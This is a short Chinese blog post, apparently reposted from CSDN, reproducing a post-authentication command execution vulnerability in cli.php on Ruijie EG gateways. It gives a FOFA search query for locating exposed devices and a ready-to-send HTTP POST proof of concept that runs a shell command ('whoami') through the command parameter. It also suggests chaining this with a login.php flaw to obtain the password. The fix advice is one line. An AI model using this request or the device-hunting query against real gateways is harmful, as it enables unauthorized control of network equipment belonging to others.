【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞

Nx01 产品简介

        锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。

Nx02 漏洞描述

        锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。

Nx03 产品主页

fofa-query: app="Ruijie-EG易网关" && body="/login.php?a=version"

Nx04 漏洞复现

POC:

POST /cli.php?a=shell HTTP/1.1
Host: {
   
   {Hostname}}
Connection: close
Content-Length: 28
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=;

notdelay=true&command=whoami

Nx05 修复建议

建议联系软件厂商进行处理。

猜你喜欢

转载自blog.csdn.net/qq_37113223/article/details/135480070